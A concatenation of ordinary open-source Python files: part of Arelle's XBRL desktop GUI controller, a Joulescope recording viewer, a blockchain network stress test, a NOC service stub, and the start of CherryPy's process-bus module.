tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
if self.modelManager.validateDedupCalcs:
c += _("\nDeduplicate calculations")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateDedupCalcs(self, *args):
self.modelManager.validateDedupCalcs = self.validateDedupCalcs.get()
self.config["validateDedupCalcs"] = self.modelManager.validateDedupCalcs
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def setShowDebugMessages(self, *args):
self.config["showDebugMessages"] = self.showDebugMessages.get()
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} ({1}bit)\n"
"An open source XBRL platform\n"
"\u00a9 2010-{2} Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2016 Python Software Foundation"
"\n Tcl/Tk {6} \u00a9 Univ. of Calif., Sun, Scriptics, ActiveState, and others"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"{3}"
"\n May include installable plug-in modules with author-specific license terms"
)
.format(Version.__version__, self.systemWordSize, Version.copyrightLatestYear,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp"
"\n CherryPy \u00a9 2002-2013 CherryPy Team") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION, Tcl().eval('info patchlevel')
))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", refs=[], level=logging.INFO):
if level == logging.DEBUG and not self.showDebugMessages.get():
return
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if refs:
message += " - " + Cntlr.logRefsFileLines(refs)
elif file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
try:
message = message % messageArgs
except (KeyError, TypeError, ValueError) as ex:
message += " \nMessage log error: " + str(ex)
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True;
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if isinstance(multFileNames, (tuple,list)):
return multFileNames
return re.findall("[{]([^}]+)[}]", # older multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
self.logRecordBuffer = None
def startLogBuffering(self):
if self.logRecordBuffer is None:
self.logRecordBuffer = []
def endLogBuffering(self):
self.logRecordBuffer = None
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
if self.logRecordBuffer is not None:
self.logRecordBuffer.append(logRecord)
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg, level=logRecord.levelno)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=30))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
if sys.platform == "darwin":
_resourcesDir = Cntlr.resourcesDir()
for _tcltk in ("tcl", "tk"):
for _tcltkVer in ("8.5", "8.6"):
_tcltkDir = os.path.join(_resourcesDir, _tcltk + _tcltkVer)
if os.path.exists(_tcltkDir):
os.environ[_tcltk.upper() + "_LIBRARY"] = _tcltkDir
elif sys.platform == 'win32':
if getattr(sys, 'frozen', False): # windows requires fake stdout/stderr because no write/flush (e.g., EdgarRenderer LocalViewer pybottle)
class dummyFrozenStream:
def __init__(self): pass
def write(self,data): pass
def read(self,data): pass
def flush(self): pass
def close(self): pass
sys.stdout = dummyFrozenStream()
sys.stderr = dummyFrozenStream()
sys.stdin = dummyFrozenStream()
global restartMain
while restartMain:
restartMain = False
try:
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelleGUI"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
application.mainloop()
except Exception: # unable to start Tk or other fatal error
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
logMsg = "{}\nCall Trace\n{}\nEnvironment {}".format(msg, tracebk, os.environ)
print(logMsg, file=sys.stderr)
if syslog is not None:
syslog.openlog("Arelle")
syslog.syslog(syslog.LOG_ALERT, logMsg)
try: # this may crash. Note syslog has 1k message length
logMsg = "tcl_pkgPath {} tcl_library {} tcl version {}".format(
Tcl().getvar("tcl_pkgPath"), Tcl().getvar("tcl_library"), Tcl().eval('info patchlevel'))
if syslog is not None:
syslog.syslog(syslog.LOG_ALERT, logMsg)
print(logMsg, file=sys.stderr)
except:
pass
if syslog is not None:
syslog.closelog()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
|
recording_viewer_device.py
|
# Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from joulescope.data_recorder import DataReader
from joulescope.view import data_array_to_update
from joulescope_ui.data_view_api import DataViewApi
from joulescope import span
import os
import numpy as np
import threading
import queue
import weakref
import logging
TIMEOUT = 10.0
class RecordingView:
"""A user-interface-compatible device that displays previous recorded data"""
def __init__(self, parent):
self._parent = weakref.ref(parent)
self._x_range = [0.0, 1.0]
self._span = None
self._x = None
self._samples_per = 1
self._refresh_requested = False
self._cache = None
self.on_update_fn = None # callable(data)
self._log = logging.getLogger(__name__)
def __str__(self):
return f'RecordingView()'
def __len__(self):
if self._span is None:
return 0
return self._span.length
@property
def sampling_frequency(self):
return self._parent().sampling_frequency
@property
def calibration(self):
return self._parent().calibration
@property
def limits(self):
"""Get the (x_min, x_max) limits for the view."""
if self._span is not None:
return list(self._span.limits)
return None
@property
def _reader(self):
return self._parent()._reader
@property
def voltage_range(self):
return self._reader.voltage_range
def _on_x_change(self, cmd, kwargs):
x_range = self._x_range
if cmd == 'resize': # {pixels: int}
length = kwargs['pixels']
if length is not None and length != self._span.length:
self._log.info('resize %s', length)
self._span.length = length
self._cache = None # invalidate
x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
elif cmd == 'span_absolute': # {range: (start: float, stop: float)}]
x_range, self._samples_per, self._x = self._span.conform_discrete(kwargs.get('range'))
elif cmd == 'span_relative': # {pivot: float, gain: float}]
x_range, self._samples_per, self._x = self._span.conform_discrete(
x_range, gain=kwargs.get('gain'), pivot=kwargs.get('pivot'))
elif cmd == 'span_pan':
delta = kwargs.get('delta', 0.0)
x_range = [x_range[0] + delta, x_range[-1] + delta]
x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
elif cmd == 'refresh':
self._cache = None # invalidate
self._refresh_requested = True
return
else:
self._log.warning('on_x_change(%s) unsupported', cmd)
return
if self._x_range != x_range:
self._cache = None # invalidate
self._x_range = x_range
self._refresh_requested = True
self._log.info('cmd=%s, changed=%s, length=%s, span=%s, range=%s, samples_per=%s',
cmd, self._cache is None, len(self), self._x_range,
self._x_range[1] - self._x_range[0], self._samples_per)
def _update(self):
if not callable(self.on_update_fn) or self._reader is None:
return
self._refresh_requested = False
if self._cache is not None:
self.on_update_fn(self._cache)
return
f = self._reader.sampling_frequency
self._log.info('update: x_range=%r', self._x_range)
start, stop = [int(x * f) for x in self._x_range]
self._log.info('update: x_range=%r => (%s, %s)', self._x_range, start, stop)
data = self._reader.data_get(start, stop, self._samples_per)
t_start = start / self._reader.sampling_frequency
t_stop = stop / self._reader.sampling_frequency
x = np.linspace(t_start, t_stop, len(data), dtype=np.float64)
if not len(x):
self._log.info('update: empty')
else:
self._log.info('update: len=%d, x_range=>(%s, %s)', len(data), x[0], x[-1])
self._cache = data_array_to_update(self.limits, x, data)
self.on_update_fn(self._cache)
def time_to_sample_id(self, t):
if self._reader is None:
return None
return self._reader.time_to_sample_id(t)
def sample_id_to_time(self, t):
if self._reader is None:
return None
return self._reader.sample_id_to_time(t)
def _statistics_get(self, start=None, stop=None, units=None):
"""Get the statistics for the collected sample data over a time range.
:param start: The starting time relative to the streaming start time.
:param stop: The ending time.
:param units: The units for start and stop.
'seconds' or None is in floating point seconds relative to the view.
'samples' is in stream buffer sample indices.
:return: The statistics data structure.
"""
if self._reader is None:
return None
return self._reader.statistics_get(start=start, stop=stop, units=units)
def _statistics_get_multiple(self, ranges, units=None):
return [self._statistics_get(x[0], x[1], units=units) for x in ranges]
def _samples_get(self, start=None, stop=None, units=None, fields=None):
r = self._reader
if r is None:
return None
return r.samples_get(start, stop, units, fields)
def open(self):
f = self._reader.sampling_frequency
if f <= 0:
self._log.warning('Invalid sampling_frequency %r, assume 1 Hz', f)
f = 1.0
r = self._reader.sample_id_range
x_lim = [x / f for x in r]
self._span = span.Span(x_lim, 1 / f, 100)
self._x_range, self._samples_per, self._x = self._span.conform_discrete(x_lim)
self._cache = None # invalidate
def close(self):
if self._parent()._thread is not None:
return self._parent()._post_block('view_close', None, self)
def refresh(self, force=None):
return self._parent()._post('refresh', self, {'force': force})
def on_x_change(self, cmd, kwargs):
self._parent()._post('on_x_change', self, (cmd, kwargs))
def samples_get(self, start=None, stop=None, units=None, fields=None):
"""Get exact samples over a range.
:param start: The starting time.
:param stop: The ending time.
:param units: The units for start and stop.
'seconds' or None is in floating point seconds relative to the view.
'samples' is in stream buffer sample indicies.
:param fields: The list of field names to get.
"""
args = {'start': start, 'stop': stop, 'units': units, 'fields': fields}
return self._parent()._post_block('samples_get', self, args)
def statistics_get(self, start=None, stop=None, units=None, callback=None):
"""Get statistics over a range.
:param start: The starting time.
:param stop: The ending time.
:param units: The units for start and stop.
'seconds' or None is in floating point seconds relative to the view.
'samples' is in stream buffer sample indicies.
:param callback: The optional callable. When provided, this method will
not block and the callable will be called with the statistics
data structure from the view thread.
:return: The statistics data structure or None if callback is provided.
"""
args = {'start': start, 'stop': stop, 'units': units}
if callback is None:
return self._parent()._post_block('statistics_get', self, args)
else:
self._parent()._post('statistics_get', self, args, callback)
return
def statistics_get_multiple(self, ranges, units=None, callback=None, source_id=None):
args = {'ranges': ranges, 'units': units, 'source_id': source_id}
if callback is None:
return self._parent()._post_block('statistics_get_multiple', self, args)
else:
self._parent()._post('statistics_get_multiple', self, args, callback)
return
def ping(self, *args, **kwargs):
return self._parent()._post_block('ping', self, (args, kwargs))
class RecordingViewerDevice:
"""A user-interface-compatible device that displays previous recorded data
:param filename: The filename path to the pre-recorded data.
"""
def __init__(self, filename, current_ranging_format=None):
if isinstance(filename, str) and not os.path.isfile(filename):
raise IOError('file not found')
self._filename = filename
self._current_ranging_format = current_ranging_format
self._reader = None
self._views = []
self._coalesce = {}
self._thread = None
self._cmd_queue = queue.Queue() # tuples of (command, args, callback)
self._response_queue = queue.Queue()
self._quit = False
self._log = logging.getLogger(__name__)
def __str__(self):
return os.path.basename(self._filename)
@property
def filename(self):
return self._filename
@property
def sampling_frequency(self):
if self._reader is None:
return None
return self._reader.sampling_frequency
@property
def calibration(self):
if self._reader is None:
return None
return self._reader.calibration
@property
def voltage_range(self):
return self._reader.voltage_range
def _cmd_process(self, cmd, view, args, cbk):
rv = None
try:
# self._log.debug('_cmd_process %s - start', cmd)
if cmd == 'refresh':
view._refresh_requested = True
elif cmd == 'on_x_change':
rv = view._on_x_change(*args)
elif cmd == 'samples_get':
rv = view._samples_get(**args)
elif cmd == 'statistics_get':
rv = view._statistics_get(**args)
elif cmd == 'statistics_get_multiple':
rv = view._statistics_get_multiple(**args)
elif cmd == 'view_factory':
self._views.append(args)
rv = args
elif cmd == 'view_close':
if args in self._views:
self._views.remove(args)
elif cmd == 'open':
rv = self._open()
elif cmd == 'close':
rv = self._close()
elif cmd == 'ping':
rv = args
else:
self._log.warning('unsupported command %s', cmd)
except:
self._log.exception('While running command')
if callable(cbk):
try:
cbk(rv)
except:
self._log.exception('in callback')
def run(self):
cmd_count = 0
timeout = 1.0
self._log.info('RecordingViewerDevice.start')
while not self._quit:
try:
cmd, view, args, cbk = self._cmd_queue.get(timeout=timeout)
except queue.Empty:
timeout = 1.0
for value in self._coalesce.values():
self._cmd_process(*value)
self._coalesce.clear()
for view in self._views:
if view._refresh_requested:
view._update()
cmd_count = 0
continue
cmd_count += 1
timeout = 0.0
try:
source_id = args.pop('source_id')
except:
source_id = None
if source_id is not None:
key = f'{view}_{cmd}_{source_id}' # keep most recent only
self._coalesce[key] = (cmd, view, args, cbk)
else:
self._cmd_process(cmd, view, args, cbk)
self._log.info('RecordingViewerDevice.run done')
def _post(self, command, view=None, args=None, cbk=None):
if self._thread is None:
self._log.info('RecordingViewerDevice._post(%s) when thread not running', command)
else:
self._cmd_queue.put((command, view, args, cbk))
def _post_block(self, command, view=None, args=None, timeout=None):
timeout = TIMEOUT if timeout is None else float(timeout)
# self._log.debug('_post_block %s start', command)
while not self._response_queue.empty():
self._log.warning('response queue not empty')
try:
self._response_queue.get(timeout=0.0)
except queue.Empty:
pass
if self._thread is None:
raise IOError('View thread not running')
self._post(command, view, args, lambda rv_=None: self._response_queue.put(rv_))
try:
rv = self._response_queue.get(timeout=timeout)
except queue.Empty as ex:
self._log.error('RecordingViewerDevice thread hung: %s - FORCE CLOSE', command)
self._post('close', None, None)
self._thread.join(timeout=TIMEOUT)
self._thread = None
rv = ex
except Exception as ex:
rv = ex
if isinstance(rv, Exception):
raise IOError(rv)
# self._log.debug('_post_block %s done', command) # rv
return rv
def _open(self):
self._reader = DataReader()
if self._current_ranging_format is not None:
self._reader.raw_processor.suppress_mode = self._current_ranging_format
self._reader.open(self._filename) # todo progress bar updates
self._log.info('RecordingViewerDevice.open')
def _close(self):
if self._reader is not None:
self._reader.close()
self._reader = None
self._quit = True
def view_factory(self):
view = RecordingView(self)
return self._post_block('view_factory', None, view)
def open(self, event_callback_fn=None):
self.close()
self._log.info('open')
self._thread = threading.Thread(name='view', target=self.run)
self._thread.start()
self._post_block('open')
def close(self):
if self._thread is not None:
self._log.info('close')
try:
self._post_block('close')
except Exception:
self._log.exception('while attempting to close')
self._thread.join(timeout=TIMEOUT)
self._thread = None
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, aacio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, aacio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, aacio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="aacio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission aacio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
stub.py
|
# ----------------------------------------------------------------------
# Service stub for scripts and commands
# ----------------------------------------------------------------------
# Copyright (C) 2007-2020 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import logging
import threading
from collections import defaultdict
import asyncio
from typing import Optional, Dict
# NOC modules
from noc.core.dcs.loader import get_dcs, DEFAULT_DCS
from noc.config import config
from noc.core.liftbridge.base import LiftBridgeClient
from noc.core.ioloop.util import run_sync
from .rpc import RPCProxy
class ServiceStub(object):
name = "stub"
pooled = False
def __init__(self):
self.logger = logging.getLogger("stub")
self.is_ready = threading.Event()
self.config = None
self._metrics = defaultdict(list)
self.loop: Optional[asyncio.BaseEventLoop] = None
def start(self):
t = threading.Thread(target=self._start)
t.setDaemon(True)
t.start()
self.is_ready.wait()
def _start(self):
self.loop = asyncio.get_event_loop()
# Initialize DCS
self.dcs = get_dcs(DEFAULT_DCS)
# Activate service
self.logger.warning("Activating stub service")
self.logger.warning("Starting IOLoop")
self.loop.call_soon(self.is_ready.set)
self.loop.run_forever()
def get_event_loop(self) -> asyncio.BaseEventLoop:
return self.loop
def open_rpc(self, name, pool=None, sync=False, hints=None):
"""
Returns RPC proxy object.
"""
if pool:
svc = "%s-%s" % (name, pool)
else:
svc = name
return RPCProxy(self, svc, sync=sync, hints=hints)
def iter_rpc_retry_timeout(self):
"""
Yield timeout to wait after unsuccessful RPC connection
"""
for t in config.rpc.retry_timeout.split(","):
yield float(t)
def register_metrics(self, table, data):
self._metrics[table] += data
def publish(
self,
value: bytes,
stream: str,
partition: Optional[int] = None,
key: Optional[bytes] = None,
headers: Optional[Dict[str, bytes]] = None,
):
async def wrap():
async with LiftBridgeClient() as client:
await client.publish(
value=value,
stream=stream,
partition=partition,
key=key,
headers=headers,
auto_compress=bool(config.liftbridge.compression_method),
)
run_sync(wrap)
|
wspbus.py
|
r"""An implementation of the Web Site Process Bus.
This module is completely standalone, depending only on the stdlib.
Web Site Process Bus
--------------------
A Bus object is used to contain and manage site-wide behavior:
daemonization, HTTP server start/stop, process reload, signal handling,
drop privileges, PID file management, logging for all of these,
and many more.
In addition, a Bus object provides a place for each web framework
to register code that runs in response to site-wide events (like
process start and stop), or which controls or otherwise interacts with
the site-wide components mentioned above. For example, a framework which
uses file-based templates would add known template filenames to an
autoreload component.
Ideally, a Bus object will be flexible enough to be useful in a variety
of invocation scenarios:
1. The deployer starts a site from the command line via a
framework-neutral deployment script; applications from multiple frameworks
are mixed in a single site. Command-line arguments and configuration
files are used to define site-wide components such as the HTTP server,
WSGI component graph, autoreload behavior, signal handling, etc.
2. The deployer starts a site via some other process, such as Apache;
applications from multiple frameworks are mixed in a single site.
Autoreload and signal handling (from Python at least) are disabled.
3. The deployer starts a site via a framework-specific mechanism;
for example, when running tests, exploring tutorials, or deploying
single applications from a single framework. The framework controls
which site-wide components are enabled as it sees fit.
The Bus object in this package uses topic-based publish-subscribe
messaging to accomplish all this. A few topic channels are built in
('start', 'stop', 'exit', 'graceful', 'log', and 'main'). Frameworks and
site containers are free to define their own. If a message is sent to a
channel that has not been defined or has no listeners, there is no effect.
In general, there should only ever be a single Bus object per process.
Frameworks and site containers share a single Bus object by publishing
messages and subscribing listeners.
The Bus object works as a finite state machine which models the current
state of the process. Bus methods move it from one state to another;
those methods then publish to subscribed listeners on the channel for
the new state.::
O
|
V
STOPPING --> STOPPED --> EXITING -> X
A A |
| \___ |
| \ |
| V V
STARTED <-- STARTING
"""
import atexit
ctypes = None
import operator
import os
import sys
import threading
import time
import traceback as _traceback
import warnings
import subprocess
import functools
import six
# Here I save the value of os.getcwd(), which, if I am imported early enough,
# will be the directory from which the startup script was run. This is needed
# by _do_execv(), to change back to the original directory before execv()ing a
